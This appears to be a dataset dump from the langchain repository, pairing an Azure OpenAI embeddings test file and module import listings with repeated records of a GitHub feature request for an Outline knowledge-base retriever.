"""Test openai embeddings.""" import os from typing import Any import numpy as np import pytest from langchain.embeddings import AzureOpenAIEmbeddings def _get_embeddings(**kwargs: Any) -> AzureOpenAIEmbeddings: return AzureOpenAIEmbeddings( openai_api_version=os.environ.get("AZURE_OPENAI_API_VERSION", ""), **kwargs, ) def test_azure_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = _get_embeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 def test_azure_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = _get_embeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.asyncio async def test_azure_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = _get_embeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 def test_azure_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = _get_embeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.asyncio async def test_azure_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = _get_embeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 @pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.") def test_azure_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" import openai document = ["", "abc"] embedding = _get_embeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 def test_embed_documents_normalized() -> None: output = _get_embeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) def test_embed_query_normalized() -> None: output = _get_embeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request

A retriever for documents from [Outline](https://github.com/outline/outline).

The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post

The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia

### Motivation

Outline is an open source project that lets you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.

### Your contribution

PR will be coming soon.
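
Since the `outline.py` and notebook contents are empty in this dump, the following is only a hypothetical sketch of the search call the request describes, not the implementation merged in the linked PR. The endpoint path and payload follow Outline's public API docs linked above; the function shape, env var names, and response fields are assumptions:

import os
from typing import List

import requests

from langchain.schema import Document


def search_outline(query: str, top_k: int = 3) -> List[Document]:
    """Hypothetical: query an Outline instance's documented search endpoint
    (POST {instance}/api/documents.search with a bearer token) and wrap hits
    as LangChain Documents. OUTLINE_INSTANCE_URL and OUTLINE_API_KEY are
    assumed env var names, not names from the merged retriever."""
    response = requests.post(
        f"{os.environ['OUTLINE_INSTANCE_URL']}/api/documents.search",
        headers={"Authorization": f"Bearer {os.environ['OUTLINE_API_KEY']}"},
        json={"query": query, "limit": top_k},
    )
    response.raise_for_status()
    return [
        Document(
            page_content=item["document"]["text"],
            metadata={"title": item["document"]["title"]},
        )
        for item in response.json()["data"]
    ]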
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
docs/docs/integrations/retrievers/outline.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request

A retriever for documents from [Outline](https://github.com/outline/outline).

The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post

The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia

### Motivation

Outline is an open source project that lets you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.

### Your contribution

PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/retrievers/__init__.py
"""**Retriever** class returns Documents given a text **query**. It is more general than a vector store. A retriever does not need to be able to store documents, only to return (or retrieve) it. Vector stores can be used as the backbone of a retriever, but there are other types of retrievers as well. **Class hierarchy:** .. code-block:: BaseRetriever --> <name>Retriever # Examples: ArxivRetriever, MergerRetriever **Main helpers:** .. code-block:: Document, Serializable, Callbacks, CallbackManagerForRetrieverRun, AsyncCallbackManagerForRetrieverRun """ from langchain.retrievers.arcee import ArceeRetriever from langchain.retrievers.arxiv import ArxivRetriever from langchain.retrievers.azure_cognitive_search import AzureCognitiveSearchRetriever from langchain.retrievers.bm25 import BM25Retriever from langchain.retrievers.chaindesk import ChaindeskRetriever from langchain.retrievers.chatgpt_plugin_retriever import ChatGPTPluginRetriever from langchain.retrievers.cohere_rag_retriever import CohereRagRetriever from langchain.retrievers.contextual_compression import ContextualCompressionRetriever from langchain.retrievers.docarray import DocArrayRetriever from langchain.retrievers.elastic_search_bm25 import ElasticSearchBM25Retriever from langchain.retrievers.embedchain import EmbedchainRetriever from langchain.retrievers.ensemble import EnsembleRetriever from langchain.retrievers.google_cloud_documentai_warehouse import ( GoogleDocumentAIWarehouseRetriever, ) from langchain.retrievers.google_vertex_ai_search import ( GoogleCloudEnterpriseSearchRetriever, GoogleVertexAIMultiTurnSearchRetriever, GoogleVertexAISearchRetriever, ) from langchain.retrievers.kay import KayAiRetriever from langchain.retrievers.kendra import AmazonKendraRetriever from langchain.retrievers.knn import KNNRetriever from langchain.retrievers.llama_index import ( LlamaIndexGraphRetriever, LlamaIndexRetriever, ) from langchain.retrievers.merger_retriever import MergerRetriever from langchain.retrievers.metal import MetalRetriever from langchain.retrievers.milvus import MilvusRetriever from langchain.retrievers.multi_query import MultiQueryRetriever from langchain.retrievers.multi_vector import MultiVectorRetriever from langchain.retrievers.parent_document_retriever import ParentDocumentRetriever from langchain.retrievers.pinecone_hybrid_search import PineconeHybridSearchRetriever from langchain.retrievers.pubmed import PubMedRetriever from langchain.retrievers.re_phraser import RePhraseQueryRetriever from langchain.retrievers.remote_retriever import RemoteLangChainRetriever from langchain.retrievers.self_query.base import SelfQueryRetriever from langchain.retrievers.svm import SVMRetriever from langchain.retrievers.tavily_search_api import TavilySearchAPIRetriever from langchain.retrievers.tfidf import TFIDFRetriever from langchain.retrievers.time_weighted_retriever import ( TimeWeightedVectorStoreRetriever, ) from langchain.retrievers.vespa_retriever import VespaRetriever from langchain.retrievers.weaviate_hybrid_search import WeaviateHybridSearchRetriever from langchain.retrievers.web_research import WebResearchRetriever from langchain.retrievers.wikipedia import WikipediaRetriever from langchain.retrievers.zep import ZepRetriever from langchain.retrievers.zilliz import ZillizRetriever __all__ = [ "AmazonKendraRetriever", "ArceeRetriever", "ArxivRetriever", "AzureCognitiveSearchRetriever", "ChatGPTPluginRetriever", "ContextualCompressionRetriever", "ChaindeskRetriever", "CohereRagRetriever", "ElasticSearchBM25Retriever", 
"EmbedchainRetriever", "GoogleDocumentAIWarehouseRetriever", "GoogleCloudEnterpriseSearchRetriever", "GoogleVertexAIMultiTurnSearchRetriever", "GoogleVertexAISearchRetriever", "KayAiRetriever", "KNNRetriever", "LlamaIndexGraphRetriever", "LlamaIndexRetriever", "MergerRetriever", "MetalRetriever", "MilvusRetriever", "MultiQueryRetriever", "PineconeHybridSearchRetriever", "PubMedRetriever", "RemoteLangChainRetriever", "SVMRetriever", "SelfQueryRetriever", "TavilySearchAPIRetriever", "TFIDFRetriever", "BM25Retriever", "TimeWeightedVectorStoreRetriever", "VespaRetriever", "WeaviateHybridSearchRetriever", "WikipediaRetriever", "ZepRetriever", "ZillizRetriever", "DocArrayRetriever", "RePhraseQueryRetriever", "WebResearchRetriever", "EnsembleRetriever", "ParentDocumentRetriever", "MultiVectorRetriever", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/retrievers/outline.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request

A retriever for documents from [Outline](https://github.com/outline/outline).

The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post

The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia

### Motivation

Outline is an open source project that lets you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.

### Your contribution

PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/utilities/__init__.py
"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from typing import Any from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper def _import_alpha_vantage() -> Any: from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper return AlphaVantageAPIWrapper def _import_apify() -> Any: from langchain.utilities.apify import ApifyWrapper return ApifyWrapper def _import_arcee() -> Any: from langchain.utilities.arcee import ArceeWrapper return ArceeWrapper def _import_arxiv() -> Any: from langchain.utilities.arxiv import ArxivAPIWrapper return ArxivAPIWrapper def _import_awslambda() -> Any: from langchain.utilities.awslambda import LambdaWrapper return LambdaWrapper def _import_bibtex() -> Any: from langchain.utilities.bibtex import BibtexparserWrapper return BibtexparserWrapper def _import_bing_search() -> Any: from langchain.utilities.bing_search import BingSearchAPIWrapper return BingSearchAPIWrapper def _import_brave_search() -> Any: from langchain.utilities.brave_search import BraveSearchWrapper return BraveSearchWrapper def _import_duckduckgo_search() -> Any: from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper return DuckDuckGoSearchAPIWrapper def _import_golden_query() -> Any: from langchain.utilities.golden_query import GoldenQueryAPIWrapper return GoldenQueryAPIWrapper def _import_google_places_api() -> Any: from langchain.utilities.google_places_api import GooglePlacesAPIWrapper return GooglePlacesAPIWrapper def _import_google_scholar() -> Any: from langchain.utilities.google_scholar import GoogleScholarAPIWrapper return GoogleScholarAPIWrapper def _import_google_search() -> Any: from langchain.utilities.google_search import GoogleSearchAPIWrapper return GoogleSearchAPIWrapper def _import_google_serper() -> Any: from langchain.utilities.google_serper import GoogleSerperAPIWrapper return GoogleSerperAPIWrapper def _import_graphql() -> Any: from langchain.utilities.graphql import GraphQLAPIWrapper return GraphQLAPIWrapper def _import_jira() -> Any: from langchain.utilities.jira import JiraAPIWrapper return JiraAPIWrapper def _import_max_compute() -> Any: from langchain.utilities.max_compute import MaxComputeAPIWrapper return MaxComputeAPIWrapper def _import_metaphor_search() -> Any: from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper return MetaphorSearchAPIWrapper def _import_openweathermap() -> Any: from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper return OpenWeatherMapAPIWrapper def _import_portkey() -> Any: from langchain.utilities.portkey import Portkey return Portkey def _import_powerbi() -> Any: from langchain.utilities.powerbi import PowerBIDataset return PowerBIDataset def _import_pubmed() -> Any: from langchain.utilities.pubmed import PubMedAPIWrapper return PubMedAPIWrapper def _import_python() -> Any: from langchain.utilities.python import PythonREPL return PythonREPL def _import_scenexplain() -> Any: from langchain.utilities.scenexplain import SceneXplainAPIWrapper return SceneXplainAPIWrapper def _import_searchapi() -> Any: from langchain.utilities.searchapi import SearchApiAPIWrapper return SearchApiAPIWrapper def _import_searx_search() -> Any: from langchain.utilities.searx_search import SearxSearchWrapper return SearxSearchWrapper def _import_serpapi() -> Any: from langchain.utilities.serpapi import SerpAPIWrapper return SerpAPIWrapper def 
_import_spark_sql() -> Any: from langchain.utilities.spark_sql import SparkSQL return SparkSQL def _import_sql_database() -> Any: from langchain.utilities.sql_database import SQLDatabase return SQLDatabase def _import_tensorflow_datasets() -> Any: from langchain.utilities.tensorflow_datasets import TensorflowDatasets return TensorflowDatasets def _import_twilio() -> Any: from langchain.utilities.twilio import TwilioAPIWrapper return TwilioAPIWrapper def _import_wikipedia() -> Any: from langchain.utilities.wikipedia import WikipediaAPIWrapper return WikipediaAPIWrapper def _import_wolfram_alpha() -> Any: from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper return WolframAlphaAPIWrapper def _import_zapier() -> Any: from langchain.utilities.zapier import ZapierNLAWrapper return ZapierNLAWrapper def __getattr__(name: str) -> Any: if name == "AlphaVantageAPIWrapper": return _import_alpha_vantage() elif name == "ApifyWrapper": return _import_apify() elif name == "ArceeWrapper": return _import_arcee() elif name == "ArxivAPIWrapper": return _import_arxiv() elif name == "LambdaWrapper": return _import_awslambda() elif name == "BibtexparserWrapper": return _import_bibtex() elif name == "BingSearchAPIWrapper": return _import_bing_search() elif name == "BraveSearchWrapper": return _import_brave_search() elif name == "DuckDuckGoSearchAPIWrapper": return _import_duckduckgo_search() elif name == "GoldenQueryAPIWrapper": return _import_golden_query() elif name == "GoogleScholarAPIWrapper": return _import_google_scholar() elif name == "GooglePlacesAPIWrapper": return _import_google_places_api() elif name == "GoogleSearchAPIWrapper": return _import_google_search() elif name == "GoogleSerperAPIWrapper": return _import_google_serper() elif name == "GraphQLAPIWrapper": return _import_graphql() elif name == "JiraAPIWrapper": return _import_jira() elif name == "MaxComputeAPIWrapper": return _import_max_compute() elif name == "MetaphorSearchAPIWrapper": return _import_metaphor_search() elif name == "OpenWeatherMapAPIWrapper": return _import_openweathermap() elif name == "Portkey": return _import_portkey() elif name == "PowerBIDataset": return _import_powerbi() elif name == "PubMedAPIWrapper": return _import_pubmed() elif name == "PythonREPL": return _import_python() elif name == "SceneXplainAPIWrapper": return _import_scenexplain() elif name == "SearchApiAPIWrapper": return _import_searchapi() elif name == "SearxSearchWrapper": return _import_searx_search() elif name == "SerpAPIWrapper": return _import_serpapi() elif name == "SparkSQL": return _import_spark_sql() elif name == "SQLDatabase": return _import_sql_database() elif name == "TensorflowDatasets": return _import_tensorflow_datasets() elif name == "TwilioAPIWrapper": return _import_twilio() elif name == "WikipediaAPIWrapper": return _import_wikipedia() elif name == "WolframAlphaAPIWrapper": return _import_wolfram_alpha() elif name == "ZapierNLAWrapper": return _import_zapier() else: raise AttributeError(f"Could not find: {name}") __all__ = [ "AlphaVantageAPIWrapper", "ApifyWrapper", "ArceeWrapper", "ArxivAPIWrapper", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleScholarAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", 
"Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearchApiAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request

A retriever for documents from [Outline](https://github.com/outline/outline).

The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post

The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia

### Motivation

Outline is an open source project that lets you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.

### Your contribution

PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/utilities/outline.py